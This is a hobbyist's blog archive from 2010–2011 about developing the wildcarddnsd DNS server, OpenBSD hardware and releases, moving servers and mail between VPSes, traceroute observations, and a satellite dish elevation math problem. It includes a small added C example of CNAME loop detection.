I use the system for programming, system administration support (with vmware this is easy) and everyday tasks. I don't game, this is not a gamer system for me. I do use iTunes as I had a brief Mac OS X history.


Wildcarddnsd now over 10,000 lines of C code

September 30th, 2010

Well, I've been anticipating this for a few weeks now. Wildcarddnsd grew to over 10,000 lines of C code. It's not all my C code though. I added some outside code (code re-use) with the recursion stuff. There is the arc4random() code from OpenSSH and the checksumming code from tcpdump, both licensed with a BSD license so it's compatible with wildcarddnsd's BSD license.

# wc -l *.[ch]
     440 additional.c
     161 bsd-arc4random.c
     180 db.h
     168 dns.h
      40 endian.h
      73 include.h
    2565 main.c
    1236 parse.c
    2288 recurse.c
     255 region.c
    2444 reply.c
     183 wildcard.c
   10033 total

Wildcarddnsd will likely grow beyond this, as new code needs to be put in place to make CNAME linking possible (as well as CNAME loop detection), so that domains such as www.yahoo.com or wildcarddns.cvs.sourceforge.net work.
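One way to follow a CNAME chain and detect loops, as an added example (not wildcarddnsd's code): remember every name visited, compare case-insensitively as DNS does, and also cap the number of hops so a long chain without a loop is cut off as well. The zone data, the hop limit and all names are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_CHAIN 8   /* assumed upper bound on CNAME hops */

enum cname_result { CN_ANSWER, CN_NOTFOUND, CN_LOOP, CN_TOO_LONG };

struct rr {
    const char *owner;
    const char *type;    /* "A" or "CNAME" in this example */
    const char *rdata;
};

/* constructed zone data */
static const struct rr zone[] = {
    { "www.example.com",  "CNAME", "web.example.net" },
    { "web.example.net",  "CNAME", "lb.example.net"  },
    { "lb.example.net",   "A",     "192.0.2.10"      },
    { "a.loop.example",   "CNAME", "b.loop.example"  },
    { "b.loop.example",   "CNAME", "A.LOOP.example"  },  /* back to a */
    { "self.example",     "CNAME", "self.example"    },
    { "dangling.example", "CNAME", "gone.example"    },
};
#define ZONE_LEN (sizeof(zone) / sizeof(zone[0]))

static const struct rr *lookup(const char *name)
{
    size_t i;

    for (i = 0; i < ZONE_LEN; i++)
        if (strcasecmp(zone[i].owner, name) == 0)
            return &zone[i];
    return NULL;
}

/* Follow CNAMEs starting at qname.  On CN_ANSWER *answer points at the
 * final rdata; *hops is the number of CNAMEs followed in every case. */
enum cname_result follow_cname(const char *qname, int max_hops,
                               const char **answer, int *hops)
{
    const char *seen[MAX_CHAIN + 1];   /* names already visited */
    const char *name = qname;
    int nseen = 0, i;

    if (max_hops < 0 || max_hops > MAX_CHAIN)
        max_hops = MAX_CHAIN;
    *answer = NULL;
    *hops = 0;

    for (;;) {
        const struct rr *r;

        /* a name we have already been at means the chain is circular */
        for (i = 0; i < nseen; i++)
            if (strcasecmp(seen[i], name) == 0)
                return CN_LOOP;
        seen[nseen++] = name;

        r = lookup(name);
        if (r == NULL)
            return CN_NOTFOUND;
        if (strcmp(r->type, "CNAME") != 0) {
            *answer = r->rdata;
            return CN_ANSWER;
        }
        if (*hops == max_hops)         /* long chain, no loop needed */
            return CN_TOO_LONG;
        (*hops)++;
        name = r->rdata;
    }
}

int main(void)
{
    static const char *label[] = { "answer", "not found", "loop", "too long" };
    static const char *q[] = { "www.example.com", "a.loop.example",
                               "self.example", "dangling.example" };
    size_t i;

    for (i = 0; i < sizeof(q) / sizeof(q[0]); i++) {
        const char *ans;
        int hops;
        enum cname_result res = follow_cname(q[i], MAX_CHAIN, &ans, &hops);

        printf("%-17s %-9s hops=%d %s\n", q[i], label[res], hops,
               ans ? ans : "");
    }
    return 0;
}
```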


Happy Anniversary FSF!

October 5th, 2010

Well slashdot made me aware of this. Yesterday the FSF turned 25. I think I even donated some duckets to them in the past too because I remember I got a note from FSF Europe thanking me or something. I'm not living in some fantasy world, currently, and reality is that OpenBSD which is my favourite OS still uses the GNU compiler, gcc, and debugger, gdb as well as gas, objdump and other utilities from the FSF. I use gdb and gcc quite often in my development of open source software and so I gotta say thanks again! Perhaps I'll make a donation in the future again.


Random Hackepedia

October 9th, 2010

We haven't had a random hackepedia in a while, and today I want to do something a bit different. It's the not-so random hackepedia. I've been working on a C Primer at Hackepedia over the last few months and want to show you the Primer. Just click on the link, I hope you can make something of it.


Observing Alpha Persei

October 17th, 2010

Unfortunately I wasn't able to make a picture of this but I'll just put an xephem screenshot out. I observed Alpha Persei aka Mirfak at NEE (60 degrees azimuth) at an altitude of about 30 degrees tonight at 9:44PM. I couldn't help but notice that the star was flickering but that could have been our atmosphere at work.

Perhaps you noticed it too, I'm waiting for Capella to rise beyond the hill that's in the way, btw.

PS: it turned out I made a mistake with the degrees altitude; the star was actually Capella, but I located Alpha Persei after that as well (at 50 degrees altitude). That means I saw Capella flickering instead of Mirfak.


Downtime Wednesday/Thursday

October 19th, 2010

On the night of Wednesday at 11PM CEST until 8AM Thursday morning CEST, proteus, the main solarscale.de/centroid.eu server, will be down. So there might be a service interruption in reading this blog (oops). Proteus is moving to Strasbourg, France from Frankfurt, Germany. The details on Europe's greenest data center, where this is moving, are found here. I'm gonna see if I can move the DNS balancing to the Panama VPS for the time being (I just hope I don't forget to undo it after the move).

PS: The maintenance went fine.

Oct 20 23:13:06 proteus exiting on signal 15
Oct 21 05:50:23 proteus syslogd 1.4.1: restart.
That's the time that proteus was off for. So roughly 6 and a half hours. The position of proteus in the network hasn't changed much, there is a 3 ms difference and the routers are the same except for 1 new address. But proteus is in France now, not Germany.


Multiculturalism dead? Is melting pot better?

October 20th, 2010

This past weekend German Chancellor Angela Merkel declared multiculturalism dead in Germany, and the key word for strive is now "Integration". This means people who immigrated to Germany have to learn the German language foremost and try to fit the norm. To me it just means giving up. In the model of culture, multiculturalism is the hardest to sustain. Just like in the model of politics democracy is weaker than a dictatorship. But we don't want to go there because dictatorships are politically incorrect, yet, they are easy to have. Just like the melting pot. I don't know how long Germany had multiculturalism. It was even the first time I heard of it this weekend, meaning it barely touched the population. But I'm pretty sure that the so-called multiculturalism will have left a minute trace of positive in the fabric of culture. Something that Angela Merkel and her exceedingly right shifting party will.. or may never get. The harder a civilization tries to uphold the weak, different, and minority the stronger it is in its roots, and the more likeable it is in the end.



Random Hackepedia

October 22nd, 2010

The RH for this week is Tail.


My dream, triple redundancy

October 22nd, 2010

I made this picture with xearth and it shows the VPS's I have, except in Singapore. I'd like to have a VPS in Singapore too but it was expensive last I checked (something like 50 Singaporean dollars, which is like over 20 euros a month). If centroid.eu ever makes money I'll consider the Singaporean VPS and balance traffic globally in such a manner that Asia-Pacific traffic goes to Singapore, EMEA traffic goes to proteus which is in France, and Americas traffic goes to goldflipper.net which is in Panama.


Got OpenBSD 4.8 in the Mail

October 25th, 2010

Well, I got the OpenBSD 4.8 CD's in the mail today. I'm very happy about this. I'll be building dione.centroid.eu with this soon.

I made an install video (like I do every release) you can watch it here.


Glad to be of help

October 31st, 2010

OpenSMTPd the OpenBSD mail daemon that is in the works, had a call for testers on the new DNS code that the daemon is using. Due to my work with wildcarddnsd I'm somewhat familiar with DNS and was able to make a contribution. Not in the form of patches which would have been nice but questioning whether the opensmtpd dns code withstood a certain scenario. It turns out given a second opinion that I was "totally right". This really made me happy and the opensmtpd is more robust as a result. This is why open source is so good because people can read the code and spot errors before they write exploit code to stress test an application (black box). If I had to write the exploit code it would have taken way more time than what it took up.


Random Hackepedia

November 5th, 2010

The RH for this week is nfsd.


More IPv6 news from the BBC

November 11th, 2010

Vint Cerf is in this BBC article warning over the IPv6 change. The date when we run out of addresses is set at 2012.


Random Hackepedia

November 12th, 2010

The RH for this week is Wait


New patchrelease for wildcarddnsd

November 15th, 2010

I should have done this a long time ago but I just released the file wildcarddnsd-beta5p4.tgz to sourceforge, this has a fix that makes the tcp and udp interaction on the server more reliable. The download is here and the branch for BETA_5STABLE is here. If you get TCP requests to a running wildcarddnsd you really want to get this.

In other news, I'm delighted to say that people from Indonesia are the top downloaders of wildcarddnsd according to the stats at sourceforge.net. Thank you! Next are Indians and Russians in the top three. Thanks to you too. I noticed a lot of Asians are interested in wildcarddnsd, which is cool.

As for BETA_6 it will probably take until next year. BETA_6 will have recursing and caching. It has it in -current now but it's broken somewhat and needs a good debugging.


Ordered two books

November 21st, 2010

I just ordered 2 books from Amazon.de. One is Pro DNS and Bind from Ron Aitchison and the other is called "DNSSEC"; I'm unsure of the author. The latter is a compilation of RFC's and other material related to DNSSEC, which I want to use in my implementation of wildcarddnsd. Hopefully the books will help me understand DNSSEC better so that I can implement this in the authoritative server side soon.


Random Hackepedia

November 26th, 2010

The RH for this week is TCPdump


Donated to FreeBSD

November 26th, 2010

I shoulda done this a long time ago but I finally got some money in my paypal account and I donated 10 dollars to the FreeBSD Foundation.

I hope they can use it wisely.



Math Problem (angle to satellite)

December 1st, 2010

Here is a math problem. Get out your old Trigonometry notes and solve the following. A satellite (Galaxy 15 for illustration purposes) is 35,779 kilometers above the surface of the earth in Geostationary orbit. Given that the earth has a radius of 6371 kilometers find out what the angle from the ground to the satellite is given that someone stands at 49 degrees north. Here is a picture:

Line ACB is perpendicular to line EC (6371 kilometers). Line EBD is 6371 kilometers + 35,779 kilometers, so 42150 kilometers. What we're looking for solving is angle BCD.


Random Hackepedia

December 3rd, 2010

The RH for this week is Ethereal


2010, a look back

December 10th, 2010

Last year we had it on December 23rd, this year a bit sooner. Here is a sum-up from the year that passed.

January 6th  - new project "cryologd" which encrypts log files

January 22nd - Oracle buys Sun.

January 27th - 24 years of computing history for myself.

February 15th - ordered Bruce Schneier's "Cryptography Engineering" book.

February 17th - OpenSMTPd bug identified and fixed.  This bug was a remote
		DoS on the smtpd.

March 9th - Wildcarddnsd at BETA_4.

March 16th - got a digital camera for my birthday.  Point and shooter.

March 20th - OpenBSD releases the 4.7 song about superpuffy.

April 18th - graphics on this blog were changed.

May 10th - ICANN releases International domain names to the public.

May 21st - My friend Dan Moschuk passes away.  RIP Dan.  You'll be 
		remembered always.

May 25th -  I registered goldflipper.net.

May 26th - I purchased a new computer, a Core i7-930 beast with 8 gigs of ram.

June 5th - this blog now uses PHP in order to serve random open source ads
		as well as easing the updating of the history.

June 13th - Facebook does IPv6 at http://www.v6.facebook.com, have always 
		used it since.

June 21st - Saturn, Mars and Venus are in a straight line alignment a very
		rare celestial event.

June 29th - Started Docking@home on my computer.  The project aims to help 
		cure diseases such as Human Immunodeficiency Virus (HIV).

July 3rd - noticed that some Koreans tried to brute-force into my computer
		via pop3.

July 7th - coded SSL support in my fire irc client.

July 9th - saw the ISS for the first time in orbit from earth.

August 24th - Windows 95 turns 15 years old.

September 5th - coded Randombot which randomly searches for web pages out
		there.  ISP cuts it off due to its similarity with conficker.

September 19th - Wildcarddnsd-current recurses but is far from stable.

September 30th - Wildcarddnsd grows beyond 10,000 lines of code.

October 5th - the FSF turns 25.

October 25th - got OpenBSD 4.8 in the mail.

October 31st - helped fix an OpenSMTPd bug in the new DNS code.

November 21st - ordered 2 books from Amazon.  Pro DNS and Bind and DNSSEC.
		Both are excellent books.

November 26th - donated 10 USD to FreeBSD Foundation.  They deserve it.

December 10th - decided to scuttle proteus.solarscale.de vps in favour of
		a soekris board.
I have mixed feelings about this year...


New Plans in the centroid network

December 10th, 2010

If you haven't noticed already, I've switched the dns records for solarscale.de and centroid.eu to goldflipper.net solely. This is in anticipation of quitting the proteus.solarscale.de vps. Instead, what I'm going to do for Europe is buy a soekris router that has no fans or drives and make that a permanent presence on the internet off my DSL. I'm keeping the goldflipper.net VPS for now. I've also been looking around Asia and Europe for a replacement VPS but I'm not sure I really need it. So why am I doing this? There are many reasons; I'm going to list a few here:

Well that's just some of the reasons.


A million eyeballs for Theo

December 17th, 2010

Recently, Theo de Raadt, the founder of OpenBSD and hacker hero, has made this announcement. In it is an allegation that a member of OpenBSD put backdoors into OpenBSD code for the FBI. A code review will result from this. Just, who is going to do this? Theo then voiced his frustrations with the OpenBSD community because our trust level is too high with the developers. He wants us to be less lazy and review code and say something when something is out of the ordinary. He doesn't believe in Eric Raymond's statement of "many eyes make bugs shallow".

Here is my idea. I want a PAGER, or an EDITOR that reports to OpenBSD at what code I'm currently looking in, how long I'm looking at a certain section of the code, what host I'm from and how idle I am and of course the time of date. The editor or pager is voluntarily used by the community and gives feedback to the OpenBSD high command how many eyes really are looking at the code. Who is looking at the code is another question that may be evaluated because a novice programmer trying to read kernel code will likely get confused and won't be much help in solving complicated structures of the code. In the end I'd like a graph made that shows exactly what areas have been "audited" by eyeballs and which areas are neglected. It should also show which areas get special attention, perhaps indicating a non-bugfree zone. Anyhow I want to show Theo that we do occasionally read the code, and the small community does too. We're really small only a few thousand on the mail list according to majordomo, so... I think this would really really help us as a community.


Administrivia

December 17th, 2010

When should this blog start to forget? This question has been with me for some time now. The idea is that after some time data and metadata should get deleted. I'd like to see this in search engines such as Google, personally. So I should practice what I preach. I'm going to make this blog a first in/first out queue with a buffer length of 25 pages. This means that possibly in February of 2011 I'll start deleting January of 2009. We'll see how it goes.


Random Hackepedia

December 17th, 2010

The RH for this week is Multicast.


December Solstice coming up

December 17th, 2010

On December 21st the sun is at solstice again. For us in the northern hemisphere it's at its lowest point of the year at high noon. To explain it best take a look at this analemma photo provided by NASA last year. The picture is a composite of pictures taken at the same time every day. The lowest point is where the December solstice would be (for the northern hemisphere).


Merry Christmas

December 24th, 2010

Merry Christmas...


Math Problem solved, new problem

December 25th, 2010

I got a scientific calculator for Christmas (a Casio fx-85ES). With it I solved the math problem from December 1st. The angle BCD is 33.7829 degrees. This would be the elevation of the satellite dish pointed at the satellite if it were exactly south (or on the same longitude). Now in reality a satellite is rarely on the same longitude but rather a bit off by a few degrees. Find out the elevation of the satellite dish if your latitude is 49 degrees and your longitude is 0 degrees (puts you in France somewhere). The satellite is at 20 degrees West longitude. Also find out the angle that your satellite dish should be moved toward west. Once you have finished these steps create a C program that solves for the following input: 1) altitude (height) of satellite, 2) orbital slot of satellite (longitude), 3) your position in longitude and latitude. The output should be the elevation of the satellite dish and the East/West alignment of the dish.

Update: In effect do this.



Random Hackepedia

December 31st, 2010

The RH for this week is Tcpdump.


IPv4 Exhaustion Counter

January 1st, 2011

I've put the IPv4 exhaustion counter on this webpage. It's at the bottom right column. As of January 1st we have 48 days left. Hello IPv6!

I have linked the IPv4 exhaustion counter on this web page. It is at the bottom right of the page. As of the first of January we still have 48 days until exhaustion. Hello IPv6!


Could this blog become bilingual?

January 1st, 2011

I'm toying with the thought of making this blog bilingual english/german.

I'm toying with the idea of making this blog bilingual (English/German).


Book wishlist

January 2nd, 2011

I found this book at Amazon that I want to get to help me with my math problem from last year. Here is the book.

I found the book linked above on Amazon. I think it could help with my math problem from last year.


Got the Lanner!

January 4th, 2011

I got the Lanner today. After figuring out the com0 console thing I was able to boot OpenBSD on it. I still need a SATA SSD for it which will arrive in the next few days. I'll post a full dmesg once I get it installed.

I received the Lanner today. After first having to figure out how the com0 console works, I was able to boot OpenBSD as well (:-)). I still need the SATA SSD for this thing, which will take a few more days. As soon as I have installed OpenBSD I will post a dmesg.

The below is a comparison with a cigarette lighter. That's how small it is.


OpenBSD + Lanner FW 7530B dmesg

January 5th, 2011

OpenBSD 4.8 (RAMDISK_CD) #89: Mon Aug 16 09:24:20 MDT 2010
    deraadt@i386.openbsd.org:/usr/src/sys/arch/i386/compile/RAMDISK_CD
cpu0: Genuine Intel(R) CPU N270 @ 1.60GHz ("GenuineIntel" 686-class) 1.60 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH
,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,EST,TM2,SSSE3,xTPR,
PDCM,MOVBE
real mem  = 1064652800 (1015MB)
avail mem = 1040326656 (992MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 11/25/09, BIOS32 rev. 0 @ 0xf0010, 
SMBIOS rev. 2.4 @ 0xfc990 (28 entries)
bios0: vendor American Megatrends Inc. version "080015" date 11/25/2009
acpi0 at bios0: rev 0
acpi0: sleep states S0 S1 S4 S5
acpi0: tables DSDT FACP APIC MCFG OEMB ASF!
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 133MHz
cpu at mainbus0: not configured
ioapic0 at mainbus0: apid 2 pa 0xfec00000, version 20, 24 pins
ioapic0: misconfigured as apic 1, remapped to apid 2
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 5 (P0P1)
acpiprt2 at acpi0: bus 1 (P0P4)
acpiprt3 at acpi0: bus 2 (P0P5)
acpiprt4 at acpi0: bus 3 (P0P6)
acpiprt5 at acpi0: bus 4 (P0P7)
acpiprt6 at acpi0: bus -1 (P0P8)
acpiprt7 at acpi0: bus -1 (P0P9)
bios0: ROM list: 0xc0000/0xec00!
pci0 at mainbus0 bus 0: configuration mode 1 (bios)
pchb0 at pci0 dev 0 function 0 "Intel 82945GME Host" rev 0x03
vga1 at pci0 dev 2 function 0 "Intel 82945GME Video" rev 0x03
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
"Intel 82945GM Video" rev 0x03 at pci0 dev 2 function 1 not configured
ppb0 at pci0 dev 28 function 0 "Intel 82801GB PCIE" rev 0x02: apic 2 int 16 
(irq 10)
pci1 at ppb0 bus 1
em0 at pci1 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: apic 2 
int 16 (irq 10), address 00:90:0b:19:56:04
ppb1 at pci0 dev 28 function 1 "Intel 82801GB PCIE" rev 0x02: apic 2 int 17 
(irq 11)
pci2 at ppb1 bus 2
em1 at pci2 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: apic 2 
int 17 (irq 11), address 00:90:0b:19:56:05
ppb2 at pci0 dev 28 function 2 "Intel 82801GB PCIE" rev 0x02: apic 2 int 18 
(irq 5)
pci3 at ppb2 bus 3
em2 at pci3 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: apic 2 
int 18 (irq 5), address 00:90:0b:19:56:06
ppb3 at pci0 dev 28 function 3 "Intel 82801GB PCIE" rev 0x02: apic 2 int 19 
(irq 15)
pci4 at ppb3 bus 4
em3 at pci4 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: apic 2 
int 19 (irq 15), address 00:90:0b:19:56:07
uhci0 at pci0 dev 29 function 0 "Intel 82801GB USB" rev 0x02: apic 2 int 23 
(irq 6)
uhci1 at pci0 dev 29 function 1 "Intel 82801GB USB" rev 0x02: apic 2 int 19 
(irq 15)
uhci2 at pci0 dev 29 function 2 "Intel 82801GB USB" rev 0x02: apic 2 int 18 
(irq 5)
uhci3 at pci0 dev 29 function 3 "Intel 82801GB USB" rev 0x02: apic 2 int 16 
(irq 10)
ehci0 at pci0 dev 29 function 7 "Intel 82801GB USB" rev 0x02: apic 2 int 23 
(irq 6)
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ppb4 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xe2
pci5 at ppb4 bus 5
em4 at pci5 dev 2 function 0 "Intel PRO/1000GT (82541GI)" rev 0x05: apic 2 
int 18 (irq 5), address 00:90:0b:19:56:08
em5 at pci5 dev 3 function 0 "Intel PRO/1000GT (82541GI)" rev 0x05: apic 2 
int 19 (irq 15), address 00:90:0b:19:56:09
ichpcib0 at pci0 dev 31 function 0 "Intel 82801GBM LPC" rev 0x02: PM disabled
pciide0 at pci0 dev 31 function 1 "Intel 82801GB IDE" rev 0x02: DMA, 
channel 0 configured to compatibility, channel 1 configured to compatibility
pciide0: channel 0 disabled (no drives)
pciide0: channel 1 ignored (disabled)
pciide1 at pci0 dev 31 function 2 "Intel 82801GBM SATA" rev 0x02: DMA, 
channel 0 configured to native-PCI, channel 1 configured to native-PCI
pciide1: using apic 2 int 19 (irq 15) for native-PCI interrupt
"Intel 82801GB SMBus" rev 0x02 at pci0 dev 31 function 3 not configured
usb1 at uhci0: USB revision 1.0
uhub1 at usb1 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb2 at uhci1: USB revision 1.0
uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb3 at uhci2: USB revision 1.0
uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb4 at uhci3: USB revision 1.0
uhub4 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
isa0 at ichpcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
com0: console
com1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
npx0 at isa0 port 0xf0/16: reported by CPUID; using exception 16
rd0: fixed, 3800 blocks
umass0 at uhub0 port 2 configuration 1 interface 0 "JMicron USB to 
ATA/ATAPI Bridge" rev 2.00/1.00 addr 2
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
cd0 at scsibus0 targ 1 lun 0:  SCSI0 
5/cdrom removable
softraid0 at root
root on rd0a swap on rd0b dump on rd0b


Inspiring article

January 5th, 2011

The next net is an interesting write-up and a call to all netizens for our own network with our own values.

The link above, "The next net", is very interesting and is a call to all netizens for our own network that reflects our ideas.


Grid Computing

January 9th, 2011

Grid computing is distributed computing, where many nodes (computers) all contribute to some distributed computing effort. Here is my contribution to grid computing. I do computing on one core for SETI search, HIV simulations etc. The question is when we will get paid (money) for offering our grid nodes. And will this be more than what cloud computing nodes charge? I doubt it'll be more, or everyone would rush to make grid computing farms on cloud computers. There has to be a balance. Grid computing is sorta the inverse of cloud computing.

Grid computing is distributed computing. Many grid nodes (computers) take part in a distributed computing task. The link above shows my grid computing contribution. I have a computing task on one core for SETI search, HIV simulations etc. The question is when we will get paid (with real money) for making our computers available. And will it be more money than cloud computing nodes charge? I don't believe it will be more, or everyone would have grid computing on cloud computers. There has to be a balance. Grid computing is a bit like the inverse of cloud computing.

Grid computing that's paid could be used to do work on over-capacity of electricity, on smart grid electrical networks.


Random Hackepedia

January 14th, 2011

The RH for this week is Streamtuner.


Random Hackepedia

January 21st, 2011

The RH for this week is Puffy.


SVP Radio

January 21st, 2011

A friend and I set up an online radio station that will be streaming from 3PM-10PM Eastern Time (North American Eastern) every Wednesday. We did some test streamings from my VPS in France and decided it was better to be streaming where the main listening audience is, in Canada. So we're in the process of seeking the right VPS near Toronto. Check out www.dj-jaz.com for more info on the stream. I'm doing a pre-recorded show every odd Wednesday of the month (so 1st, 3rd and 5th Wednesday) on the subject of computers and networks. My show is called "Peter's Computer Show".

A friend and I are preparing to set up a radio stream. It runs on Wednesdays, from 9 o'clock until 4 o'clock at night Central European Time. We have already tested the stream from my VPS in France. Then we decided to set up a VPS in Canada, where most of the listeners are. You can find out more about the stream at www.dj-jaz.com. I am the DJ of a recorded show every first, third and fifth Wednesday of the month. What I'll be talking about is computers and networks. My show is called "Peter's Computer Show". The radio is in the English language.


Random Hackepedia

January 28th, 2011

The RH for this week is Natally.


DE-CIX growth: It doesn't have to be like that

January 29th, 2011

A recent article (German) predicts the future for the German Internet Exchange (in Frankfurt) called DE-CIX. They predict that the traffic will increase 20 fold by 2015. In a traceroute from my DSL it shows the route going from Schweinfurt to Nuremberg to Frankfurt (DE-CIX) back to Erlangen (which is 30 km away from Nuremberg) and there to the ftp.de.openbsd.org server that serves my packages for OpenBSD. It's a route that makes little sense, and if Erlangen was connected for cheap to N-IX (the Nuremberg Internet Exchange) then a lot of traffic would be kept away from DE-CIX, strengthening the Internet as there isn't that single point of failure in the way.

A route showing the path from Schweinfurt-Nuremberg-Frankfurt-Erlangen...
...
 4  ppp-default.m-online.net (82.135.16.28)  68.485 ms  50.483 ms  46.633 ms
 5  gi1-8-171.r1.nue2.m-online.net (212.18.7.121)  45.863 ms  47.948 ms  46.186 ms
 6  xe-2-2-0.rt-decix.m-online.net (212.18.6.166)  49.903 ms  49.974 ms  49.825 ms
 7  zr-fra1-te0-0-0-3.x-win.dfn.de (80.81.192.222)  50.725 ms  51.753 ms  52.530 ms
 8  zr-erl1-te0-0-0-4.x-win.dfn.de (188.1.145.197)  64.62 ms  66.4 ms  65.651 ms
...

A recent article forecasts the future of the German Internet Exchange (in Frankfurt am Main), which is called DE-CIX. They forecast that Internet traffic will increase 20-fold by 2015. A traceroute from my DSL shows that the route goes from Schweinfurt through Nuremberg, through Frankfurt (DE-CIX) and from there back to Erlangen (which is 30 km from Nuremberg). The server for the route is ftp.de.openbsd.org, which houses OpenBSD packages. This route makes little sense, and if Erlangen were connected directly to N-IX (the Nuremberg Internet Exchange) with a cheap line, a lot of traffic would be routed away from DE-CIX. This would strengthen the Internet, as there would be no single point of failure (Frankfurt).


Outage for solarscale.de

January 31st, 2011

I transferred the domain solarscale.de to another registrar and something blew up. The domain has its nameservers set to the old NS servers but the old registrar had deleted the domain from its nameservers as soon as the transfer was initiated. I'm losing email :-(. I'm not sure what caused this mess because the notify email was on the solarscale.de domain and that ceased as soon as the old registrar deleted the zone. I've written my current registrar and am awaiting answers. It could be a 5 day outage. Not too cool.

I started a domain name transfer for solarscale.de and something went wrong. The domain currently has the old registrar's nameservers registered, and the old registrar has already deleted the zone's name entries (as soon as the transfer went through). I'm losing mail. :-( I'm not sure what produced this mess, since the notify emails depended on the solarscale.de domain and that of course stopped when the zone was deleted. I've written to the registrar and am expecting an answer. It could be a 5-day outage. Not so cool.

Update: Tue Feb 1 11:33:16 CET 2011 The nameservers I had specified had the zone solarscale.de in non-compliance with DENIC, the German NIC. It finally switched over to the right nameservers and I'm happy. It may take another day for the right nameservers to propagate over to the new ones, but servers that haven't queried solarscale.de in the last day will get the right data like so:

$ ping -c 1 www.solarscale.de
PING www.solarscale.de (200.46.208.61) 56(84) bytes of data.
64 bytes from goldflipper.net (200.46.208.61): icmp_seq=1 ttl=55 time=104 ms

--- www.solarscale.de ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 104.848/104.848/104.848/0.000 ms

The nameservers I specified for the zone solarscale.de had SOA data that DENIC, the German NIC, did not want to accept. But it finally succeeded and I'm glad. It could take another day until the NS entries have propagated, but servers that haven't looked at solarscale.de yet will get the right data.


Save CKLN

February 2nd, 2011

This is for my Canadian friends. The small radio station CKLN needs your help. A long time ago (well actually 2 years ago) the Ryerson Student Union didn't want to pay for CKLN anymore and a fight ensued. This fight caused CKLN to go off-air for a number of months. Being off-air is a violation of the CRTC broadcasting license and the CRTC has revoked CKLN's license in the meantime. They have until February 12th to shut down.

So if you like alternative programming. If you like pro-gay, pro-lesbian, pro-minority programming CKLN is for you. And it's this voice that is so important in an equal and fair society. Here is a link that asks you to write your MP to save CKLN. As for me I'm not a citizen of Canada and my EuMP can't do much to help, but CKLN got my support in spirit. And that doesn't mean I'm gay. I'm not.


Another useless route through DE-CIX

February 2nd, 2011

When tracerouting free.fr from my VPS, which lies in Strasbourg, the route goes from Strasbourg to Frankfurt, back to Strasbourg and on from there. This is wasteful, and it would be better if there was a mini-exchange in Strasbourg itself taking on this traffic.

pjp@proteus:~> traceroute free.fr
traceroute to free.fr (212.27.48.10), 30 hops max, 40 byte packets
 1  static-ip-85-25-57-148.inaddr.intergenia.de (85.25.57.148)  0.000 ms   0.000 ms   0.000 ms
 2  217.118.16.25 (217.118.16.25)  3.105 ms   3.182 ms   3.191 ms
 3  217.118.16.129 (217.118.16.129)  3.402 ms   3.340 ms   3.359 ms
 4  ve498.bbr1.fra3.inetbone.net (83.220.157.37)  3.346 ms   3.243 ms   3.260 ms
 5  decix.proxad.net (80.81.192.223)  4.041 ms   4.158 ms   3.975 ms
 6  strasbourg-6k-1-po101.intf.routers.proxad.net (212.27.56.29)  7.743 ms   7.580 ms   7.780 ms
...

When you do a traceroute to free.fr from my vserver/VPS, which is located in Strasbourg, you see that the route goes from Strasbourg to Frankfurt and back to Strasbourg, and then onward from there. That is of course a wasteful path, and it would be better if a mini-exchange existed in Strasbourg itself to take on this Internet traffic.


18/1!

February 4th, 2011

Well, I finally got my DSL upgrade for the next two years, I'm one happy camper.

I've now got my DSL upgrade for the next two years. I'm completely and super happy.


Blog starts to forget

February 6th, 2011

As indicated a few weeks ago, this blog will start to forget in a FIFO manner.

As promised a few weeks ago, this blog will begin to forget in a FIFO manner.

www.ipv6.solarscale.de March 7th, 2009
OpenBSD Donation March 1st, 2009
My SSH Tunnel February 25th, 2009
Why I chose static February 25th, 2009
Traceroute February 24th, 2009
The end of flavair.com February 17th, 2009
IPv6.solarscale.de February 12th, 2009
Back on the IPv6 Net!  Mo 2. Feb 14:25:20 CET 2009
A thought on the Economic Crisis Sun Feb 1 18:01:16 CET 2009
A New Beginning Fri Jan 16 19:34:10 CET 2009


Changed mailserver

February 6th, 2011

I've switched the MX records for all my domains to uranus.centroid.eu. That's my newly upgraded DSL. The old mail server proteus has almost fulfilled its mission and after four years I'm finally giving it retirement. Proteus will be switched off completely on March 13th and I've already gone through it and deleted enough signs of its use last night. Uranus and goldflipper.net will be my mainstay for the next two years and who knows what will come along by then.

I've set the MX records for all my domains to uranus.centroid.eu. That's my overhauled DSL. The old mail server proteus has almost completed its mandate and, after four years of computing time, will be switched off and retired. To be more precise, proteus will be switched off on March 13th, and I already deleted some things on the server last night. Uranus and goldflipper.net will be my main servers for the next two years, and who knows what comes then.


Random Hackepedia

February 11th, 2011

The RH for this week is Ddos.



Reading code

February 12th, 2011

Tonight I found myself reading code. The resolver code in OpenBSD to be exact. I do this when I'm looking for something... and by golly I think I've found it...
  if (++loops < 42) /*doug adams*/
          break;

